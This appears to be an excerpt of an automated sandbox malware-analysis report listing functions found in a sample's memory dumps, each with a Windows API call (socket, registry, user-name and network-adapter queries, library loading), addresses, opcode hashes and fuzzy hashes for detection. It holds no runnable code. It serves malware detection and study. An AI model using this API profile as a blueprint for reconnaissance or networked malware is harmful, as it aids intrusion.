Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 1ad4639aa95ae56bfba0b95d8e161b629b879c70fefefab6db22231ef96bed71
Instruction ID: 7965604739f4b1b5677f703b07ac82deeef2a8f0789aa5dd07d95ab8ea0abdd8
Opcode Fuzzy Hash: 1ad4639aa95ae56bfba0b95d8e161b629b879c70fefefab6db22231ef96bed71
Instruction Fuzzy Hash: 582171B55093C45FEB228F25DC54B52BFB8EF07610F0984DAED85CF253D2659808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05372CA2, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 05372D2B

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: c7e23e24cec3783f48a45e1682ce8f1614ce6302f2857e757fd37b5e64d47634
Instruction ID: 5b05541ae9da46b81273da4e5e54775b8d7138e6999c01fd8795d3ee78933de8
Opcode Fuzzy Hash: c7e23e24cec3783f48a45e1682ce8f1614ce6302f2857e757fd37b5e64d47634
Instruction Fuzzy Hash: 5E2171B54093846FE7228B659C84F96BFB8EF46310F0884ABEA849F192D365A509C761

Uniqueness

Uniqueness Score: -1.00%

Function 023AB606, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E94), ref: 023AB685

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ff84e34aa14eb7251c5d0fa4f59ce633b18af6af343146c8954148e782a0db3f
Instruction ID: 6b44cd4bed5e82a207757141ca01f436b39e532ea5c005fe34eabc52da9db663
Opcode Fuzzy Hash: ff84e34aa14eb7251c5d0fa4f59ce633b18af6af343146c8954148e782a0db3f
Instruction Fuzzy Hash: 9A21D1B2900204AFE7209F59DC84FABFBECEF14310F14846AEE449B251D730E5088AB1

Uniqueness

Uniqueness Score: -1.00%

Function 05371562, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E94), ref: 053715D6

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: edc28cbf9f1f4fa2f2bccf63dc84895162cccfc1c0e0d00b6fd91318ce1faeb7
Instruction ID: 2763b51cf99127c260d4d98d7615aa97ab38d31bd1e0ee2d7cc8e55b23ab42f7
Opcode Fuzzy Hash: edc28cbf9f1f4fa2f2bccf63dc84895162cccfc1c0e0d00b6fd91318ce1faeb7
Instruction Fuzzy Hash: 422190B2900204AFEB20DF55DC85FAAFBECEF44720F18886AED459B641D674E508CB75

Uniqueness

Uniqueness Score: -1.00%

Function 05372F6E, Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 05372FF2

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 9e107f917b41d3e34b809b4b076ccaad4938f630b0bde76d25821c41cf9bb626
Instruction ID: b884cabb56ec0b80811afa4ba7ce733eb2af8a0de75f422182edc54ee4d6447b
Opcode Fuzzy Hash: 9e107f917b41d3e34b809b4b076ccaad4938f630b0bde76d25821c41cf9bb626
Instruction Fuzzy Hash: EA2153B18053846FE721CB55DC84F97BFACEF45310F0884ABEA459B152D674A508C775

Uniqueness

Uniqueness Score: -1.00%

Function 0537303C, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 053730D1

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 109c87b24519279878a562f79e9da8841da807a1614fc705dc15f446a9797bc5
Instruction ID: 66c2a719d41753227f36aea3d672e020399b24e9e0aba820a9911224ac83d788
Opcode Fuzzy Hash: 109c87b24519279878a562f79e9da8841da807a1614fc705dc15f446a9797bc5
Instruction Fuzzy Hash: 2521F8B14083846FEB228B15DC44FA6FFB8EF02310F08849AFA845B153D274A508DB71

Uniqueness

Uniqueness Score: -1.00%

Function 05374172, Relevance: 1.6, APIs: 1, Instructions: 72encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 053741FA

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 682caaff4c740c7df1c93d072a82d05d08529aff87489024d7f565451e8627e0
Instruction ID: 238d8b7a0df189cc108641a1148859ea99e296e0aded172e668330a72a19b0b3
Opcode Fuzzy Hash: 682caaff4c740c7df1c93d072a82d05d08529aff87489024d7f565451e8627e0
Instruction Fuzzy Hash: 522180B1408384AFEB228F54DC84F66FFB8EF45310F1884AAE9889F152D375A409C771

Uniqueness

Uniqueness Score: -1.00%

Function 05372DAE, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 05372E29

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: c1d3a08412ea9f96eecbf6f5e9df527afddde25f6d99c9c70d54638cb27b26c5
Instruction ID: 274fb0781eac3a8bf91d982d33fc0974bcd43294c2cabd7eb86f14eb5a378053
Opcode Fuzzy Hash: c1d3a08412ea9f96eecbf6f5e9df527afddde25f6d99c9c70d54638cb27b26c5
Instruction Fuzzy Hash: 312159B5900604AFEB21CF55DC84FA7BBE8EF08710F04886AEA4A8B651D774E405DB61

Uniqueness

Uniqueness Score: -1.00%

Function 053725AA, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 0537261D

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 0dba44525787a681307ef25b91d5cff33f9d65fe322e456b8799aae60d76e7e1
Instruction ID: e8a05fbbfdf330ca5a6e2ae596085b33f45926bb71a312a8ccf11b78ad4b1295
Opcode Fuzzy Hash: 0dba44525787a681307ef25b91d5cff33f9d65fe322e456b8799aae60d76e7e1
Instruction Fuzzy Hash: F021D1B5900244AFE720DF29DC84F66FBE8EF04310F04846AED49CB282D7B4E804CA75

Uniqueness

Uniqueness Score: -1.00%

Function 053709C2, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 05370A41

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: a5bffb59c850c4a5d70125e59e5ada36ae2eb0a1761f8f0b839bd42f84e0b2ef
Instruction ID: d7106fc0dbe1b49a8fb034a897b30a79004898d20b2736a4b390958a16d3cb2c
Opcode Fuzzy Hash: a5bffb59c850c4a5d70125e59e5ada36ae2eb0a1761f8f0b839bd42f84e0b2ef
Instruction Fuzzy Hash: FC216271405784AFEB22CF55DC84F56BFB8EF45710F0884AAEA459B152D374A409CB71

Uniqueness

Uniqueness Score: -1.00%

Function 023AB70E, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 023AB788

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 660d3ff2fda398ff132654c1c1c93cc04a4a5903d8da2a2880e0e3f7b4c0ad0f
Instruction ID: eec900e79bc3afeaaf8bc810f9888005b65c92a318a9fffa49da1b095a5f2945
Opcode Fuzzy Hash: 660d3ff2fda398ff132654c1c1c93cc04a4a5903d8da2a2880e0e3f7b4c0ad0f
Instruction Fuzzy Hash: 3A219DB1600204AFEB20CF55CC81F66FBECEF14714F08846AEA49CB652D7A5E808CB71

Uniqueness

Uniqueness Score: -1.00%

Function 023AA140, Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 023AA1C1

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 4d8f17d0efebc4a5c065c65f7da2a59c892cbc576f2b5605a03d1a611a8f24ca
Instruction ID: 65aa5a0439c27272e1416a347423c8fca95c1f6d47322cab7f18be3febce5c8f
Opcode Fuzzy Hash: 4d8f17d0efebc4a5c065c65f7da2a59c892cbc576f2b5605a03d1a611a8f24ca
Instruction Fuzzy Hash: 17215C7240D3C09FD7138B218C54A56BFB4EF07220F0A85EBD9848F163D279A849CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0537310E, Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05373192

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: fd768df101182ecb13e9aad200d7c99d3a07d44b408567c496b81f4a9b90bb3b
Instruction ID: 72c4cb1222fdcfeaf9d03f333dd264f4fdec06093dea48999a39047bbeeeec2e
Opcode Fuzzy Hash: fd768df101182ecb13e9aad200d7c99d3a07d44b408567c496b81f4a9b90bb3b
Instruction Fuzzy Hash: D4218C754093849FDB22CF61D884A92BFF4EF06210F0988EAE9858B163D275A809DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0537166E, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 053716E0

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: fcba742fc7fc22fa4857d722e33bc3eb6072919d0f20ea52a584c0010d2b481a
Instruction ID: 9d0bfc5519699c20c0d811b61e2615a0fb633db579bacaf8eec7dc4645cad00e
Opcode Fuzzy Hash: fcba742fc7fc22fa4857d722e33bc3eb6072919d0f20ea52a584c0010d2b481a
Instruction Fuzzy Hash: 4B216AB6904204AFEB20CF55DC84FA6BBACEF44710F18886AEE499B251D774E404CA75

Uniqueness

Uniqueness Score: -1.00%

Function 05370390, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,6CEF7256,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 053703FC

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: bdf8d88d00f3bf4d057abf3fe13547e7375844265735d221828e356e491d764f
Instruction ID: b6a5709ff96d85fdea906048563ce25f4f5be4cd52dc390d7b3462a6500de70a
Opcode Fuzzy Hash: bdf8d88d00f3bf4d057abf3fe13547e7375844265735d221828e356e491d764f
Instruction Fuzzy Hash: 2B21C3725093C45FEB128F25DC54A92BFB4AF07224F0980DAEC858F663D2749908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05372206, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 05372271

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 0f834dbdbc83c07571f9f7b1c676e6ab1e79b06222f1f73b1a7cd24cb976014c
Instruction ID: 70e9c686332f515af24e680b8539e0dab1c2694bdb87885956d923b3aedec9d9
Opcode Fuzzy Hash: 0f834dbdbc83c07571f9f7b1c676e6ab1e79b06222f1f73b1a7cd24cb976014c
Instruction Fuzzy Hash: 4D21F0B1900204AFEB21CF69DC85F66FBE8EF04320F04846AFD889B641D775E404CA75

Uniqueness

Uniqueness Score: -1.00%

Function 023AAAED, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,6CEF7256,00000000,?,00000072,?,?), ref: 023AAB5C

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 244b57678075501288854d0e9170fdef0069f58ac552fefe81ecffbe3827f957
Instruction ID: 38ab7567c401aa14b6e714730f91193e3bbb25e82d3e4617245aa7a5679e2ba9
Opcode Fuzzy Hash: 244b57678075501288854d0e9170fdef0069f58ac552fefe81ecffbe3827f957
Instruction Fuzzy Hash: 742151715093845FD7128F25DC55B52BFB8EF42224F0984EBED858F6A3D3649809CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05372306, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 0537237A

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: c6e373e715fb3732866a68369331e37a8362420b2f303da4c2cbd4c9de0ec433
Instruction ID: 3f54f35e70cbee968487b318ac23d9b1b11252f39f952d25adc15713409a4cd1
Opcode Fuzzy Hash: c6e373e715fb3732866a68369331e37a8362420b2f303da4c2cbd4c9de0ec433
Instruction Fuzzy Hash: 6D219DB1900244AFFB21CF59DD84F66FBE8EF04320F04845DEA889B641D775A508CB65

Uniqueness

Uniqueness Score: -1.00%

Function 05371C4E, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 05371CBA

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 2b30e886d8f327eb132f652c509e85be2ceb315e593e9c6c3ef9392eb35756f9
Instruction ID: 0e684b9367a232915c4b370f6a4738b4114261f230cba045c90ce7d5648aceed
Opcode Fuzzy Hash: 2b30e886d8f327eb132f652c509e85be2ceb315e593e9c6c3ef9392eb35756f9
Instruction Fuzzy Hash: B921DE72900604AFEB21CF65DD84F66FFE8FF04310F04846AEA859B642D3B5A404CB71

Uniqueness

Uniqueness Score: -1.00%

Function 053732F6, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 0537335A

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 0ad3cf593208afb1172a403e6b690a6bb860aeb206095ba99858b376fbadf37e
Instruction ID: 805f7353c1624a65d1178a031230d9ca224f59a5da26d432e125f648c0fd0130
Opcode Fuzzy Hash: 0ad3cf593208afb1172a403e6b690a6bb860aeb206095ba99858b376fbadf37e
Instruction Fuzzy Hash: E01184B1904204AFFB30CF59DC85F66BBACEF44710F14886AED45CB251DB74E4049A71

Uniqueness

Uniqueness Score: -1.00%

Function 023AA73F, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E94,?,?), ref: 023AA7C2

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 496cf6f00d59ecf835e8435cd82293fac0d2f2be2a39d074c7183362ef9b4776
Instruction ID: 6e6bfa2159a503aaa62a1f81a366d47aace7812f257662c8e8aac711e2046453
Opcode Fuzzy Hash: 496cf6f00d59ecf835e8435cd82293fac0d2f2be2a39d074c7183362ef9b4776
Instruction Fuzzy Hash: E011D6715043406FD3118B15DC45F72BFB8EF86B20F15819AFD488B642D234B919C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 05371F6A, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 05371FDC

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 27dd1272ac94a0910b4d2a83b84a4b24d74fdf29fa226ca965ecc9ae1318a373
Instruction ID: 3fcbe78c013167fbb49821bf4f1dc63687fe87609fc7edaf826473977dc62773
Opcode Fuzzy Hash: 27dd1272ac94a0910b4d2a83b84a4b24d74fdf29fa226ca965ecc9ae1318a373
Instruction Fuzzy Hash: 1F1181B2900604AFEB30CF55DC80F67FBECEF44720F04855AEA569B651D764E408DA71

Uniqueness

Uniqueness Score: -1.00%

Function 0537287A, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 053728D9

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 4eb347023ad3c88b6a02a053625b51943e93d9e2b012271707faa96c2c993a38
Instruction ID: ab8c92121c5909ed4b5fe58bc1e230fa8a70946ce75d6fcb73191bf188fa617d
Opcode Fuzzy Hash: 4eb347023ad3c88b6a02a053625b51943e93d9e2b012271707faa96c2c993a38
Instruction Fuzzy Hash: 3F1104B2900204AFEB21CF55DC80FABFBA8EF44320F08846AFE499B241D774A404CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05371A54, Relevance: 1.6, APIs: 1, Instructions: 64networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 05371ACC

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 46a5ea215930da5236b3ec08fbe0b217305c631a117799f5f3ef658b504493ac
Instruction ID: c784e9e35cddd9bb08385e1f1ecb6f34ba7d3173850991b5f9e82280704a4bda
Opcode Fuzzy Hash: 46a5ea215930da5236b3ec08fbe0b217305c631a117799f5f3ef658b504493ac
Instruction Fuzzy Hash: 2C11E9714083846FE7218B55DC84F56FFBCEF45720F08849AFA449F192D364A408C771

Uniqueness

Uniqueness Score: -1.00%

Function 05372F8E, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 05372FF2

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 1ee01e2530474b66dac3314c2a342b59a1bae21007586236788ae59d57308101
Instruction ID: 4a75305e6bf442100946d3a01352618eb2aeb09f956f2c6638e69cce34adb300
Opcode Fuzzy Hash: 1ee01e2530474b66dac3314c2a342b59a1bae21007586236788ae59d57308101
Instruction Fuzzy Hash: D91194B1904208AFEB21CF55DC84FA7FFACEF44720F14886AEA599B241D774A504DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0537320E, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 0537326A

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: f8315639ea97e335269690da8fcf6cb96196d592984519c352fd07e72c4ca71c
Instruction ID: e4b1904233ae47771f81d66a3832b6fbc860b79c9f86b25a93cbbe2e16e9f0fa
Opcode Fuzzy Hash: f8315639ea97e335269690da8fcf6cb96196d592984519c352fd07e72c4ca71c
Instruction Fuzzy Hash: 351127B1904204AFEB21CF58DC80FA6FBACEF44320F04886AEE49CB641D774A404DB71

Uniqueness

Uniqueness Score: -1.00%

Function 053740B6, Relevance: 1.6, APIs: 1, Instructions: 63encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 05374112

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 837bc562d0ec530ab4c30ab18ee02b5dd7a66ca54ca671a539fa936e64c26846
Instruction ID: c6b6688bd4d42234ac9ea76380e8d869e4949484196f16ce6dda5db1f904dd4e
Opcode Fuzzy Hash: 837bc562d0ec530ab4c30ab18ee02b5dd7a66ca54ca671a539fa936e64c26846
Instruction Fuzzy Hash: FC11C4B1900204AFEB20DF65DC85FA6FBA8EF44720F14846AEE598B641D774B404CB71

Uniqueness

Uniqueness Score: -1.00%

Function 023ABEBB, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 023ABF26

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f8a8c8355c279a65df24a4ea50a40c4c2ed1980d0c4f70e55f6cc704ade431f4
Instruction ID: 5c9630b92d7c4c124046dc665badb2565790b80aa8d94198d2009ae228f83f72
Opcode Fuzzy Hash: f8a8c8355c279a65df24a4ea50a40c4c2ed1980d0c4f70e55f6cc704ade431f4
Instruction Fuzzy Hash: C111AF72409380AFDB228F50DC44B62FFB4EF4A210F0885DAED898B163D375A418DB61

Uniqueness

Uniqueness Score: -1.00%

Function 023AA2AE, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,6CEF7256,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 023AA30C

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 1dd2a1b4013121ff8e413c47e83a54b38b679ead656e3e7e7fe95d00b77b4301
Instruction ID: cffabaf47de710487be89653ecd02c8c8ca12c8fe27ebce1c22f83298365f755
Opcode Fuzzy Hash: 1dd2a1b4013121ff8e413c47e83a54b38b679ead656e3e7e7fe95d00b77b4301
Instruction Fuzzy Hash: 17113A7140E3C49FD7238B259C54A52BFB4DF47624F0980DBED848F1A3D269A809CB72

Uniqueness

Uniqueness Score: -1.00%

Function 023AA57A, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,00000E94,?,?), ref: 023AA5F2

Memory Dump Source

Source File: 0000000C.00000002.500696211.00000000023AA000.00000040.00000001.sdmp, Offset: 023AA000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 74dfb8d341ae8e7d694c7a4fa0c29386f6fdca0f08feb45a0fe119b404e7ed7b
Instruction ID: 416a8a3fcb7e0db3de226180beba5b38d2f52c4bccbf500831a98613208b1d28
Opcode Fuzzy Hash: 74dfb8d341ae8e7d694c7a4fa0c29386f6fdca0f08feb45a0fe119b404e7ed7b
Instruction Fuzzy Hash: AF11E7715093806FD311CB25CC45F66FFB4EF86A20F18819FED488B692D634B919CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 053709E2, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 05370A41

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0951e6ffe908ed1c09ebcd8d67de0d9861bb30554f750512c808ae5fd2d34b32
Instruction ID: 2379399570dde1ac3f69488f21acf6a292323097e79613967a939b316a46caa7
Opcode Fuzzy Hash: 0951e6ffe908ed1c09ebcd8d67de0d9861bb30554f750512c808ae5fd2d34b32
Instruction Fuzzy Hash: 9611E3B1800604AFEB31CF55DC84FA6FBA8EF44720F14846AEE499B251C774A404CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0537419E, Relevance: 1.6, APIs: 1, Instructions: 59encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 053741FA

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 347601ec16285d49825f533c12df648cbc68cb50a7d361bc424e23014c60cc78
Instruction ID: 96510d8414b179c5e9ef1d01d4f5fc781bc5d10e2cec51bf5df5181403641c8b
Opcode Fuzzy Hash: 347601ec16285d49825f533c12df648cbc68cb50a7d361bc424e23014c60cc78
Instruction Fuzzy Hash: C611E3B1900204AFEB20CF54DC80F66FBA8EF44720F14846AEE489B241D774A404CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0537173A, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,6CEF7256,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 05371798

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 29a2315c7d6dc590c3c658ef24f42bfe2e6184924f9105383df0d99c82014647
Instruction ID: 06b6b1fd947d734a8755bf79724afce7931104fa9e6ee88a8b7a9ffa249cb19f
Opcode Fuzzy Hash: 29a2315c7d6dc590c3c658ef24f42bfe2e6184924f9105383df0d99c82014647
Instruction Fuzzy Hash: E411B6755093C49FD7128F65DC44B52BFF4EF02210F0884EAED858F663D275A408CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05372CD2, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E94,6CEF7256,00000000,00000000,00000000,00000000), ref: 05372D2B

Memory Dump Source

Source File: 0000000C.00000002.505310371.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 08f074ab92c0e49241da07bc47181a676566ff1abdb9972eefa1c6556c79d72b
Instruction ID: a3471af797aff34a38bb6c093a786c2383c7b968850e9991c1cae0c6228cea42
Opcode Fuzzy Hash: 08f074ab92c0e49241da07bc47181a676566ff1abdb9972eefa1c6556c79d72b
Instruction Fuzzy Hash: 6611A0B5900248AFEB21DF55DC84FAAFBA8EF44720F14846AFE589B241D774A504CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 023AB452, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E94), ref: 023AB4BB

Memory Dump Source

